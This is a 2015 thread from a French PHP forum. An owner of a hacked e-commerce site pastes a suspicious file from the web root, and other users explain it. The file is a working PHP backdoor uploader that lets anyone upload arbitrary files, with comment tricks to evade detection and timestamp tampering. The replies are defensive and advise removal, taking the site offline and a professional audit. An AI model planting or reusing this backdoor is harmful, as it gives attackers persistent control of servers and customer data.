mon site ecommerce c'est fait piratr

laurent-lille
Invité n'ayant pas de compte PHPfrance

20 mars 2015, 22:41

Bonjour j'ai un site ecommerce qui c'est fait pirater en autre des fichiers apparaissent dans la racine du www.
Je ne connais rien au Php. je cherche la ou les backdoor. un fichier me semble douteux
voici son contenu
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">

<title>utf</title>

</head>

<body>

<?php

print "<h1>#p@$c@#</h1>\n";

echo "Your IP: ";

echo $_SERVER['REMOTE_ADDR'];

echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";

echo "<input type=\"file\" name=\"filename\"><br> \n";

echo "<input type=\"submit\" value=\"LOAD\"><br>\n";

echo "</form>\n";

if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))

{

move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);

$file = $_FILES/*;*/["filename"]["name"];

echo "<a href=\"$file\">$file</a>";

} else {

echo("empty");

}

$filename = $_SERVER[SCRIPT_FILENAME];

touch/*;*/($filename, $time);

?>

</body>

</html>


merci d'avance pour vos lumieres

Mammouth du PHP | 671 Messages

20 mars 2015, 23:49

un script qui permet d'uploader des fichiers, donc continuer de faire ce qu'il veux plus facilement sur le serveur.
à supprimer, mais surtout trouver la faille qui a permis de mettre ce fichier sur le serveur.

Avatar de l’utilisateur
Administrateur PHPfrance
Administrateur PHPfrance | 7240 Messages

21 mars 2015, 01:07

Je ne connais rien au Php. je cherche la ou les backdoor.
Fait appel à un professionnel, parce que si tu n'y connais rien, tu n'arriveras jamais à trouver la faille et encore moins à la corriger.

Sachant qu'en plus ton site est un site de e-commerce, cela veut dire que tu as probablement les données de tes clients qui sont potentiellement aux mains de hackers donc il est urgent :
1) de mettre immédiatement hors-ligne ton site
2) de faire appel à une société dont c'est le métier pour qu'elle analyse le problème, évalue l'ampleur du piratage et mette en place les actions correctives.
Quand tout le reste a échoué, lisez le mode d'emploi...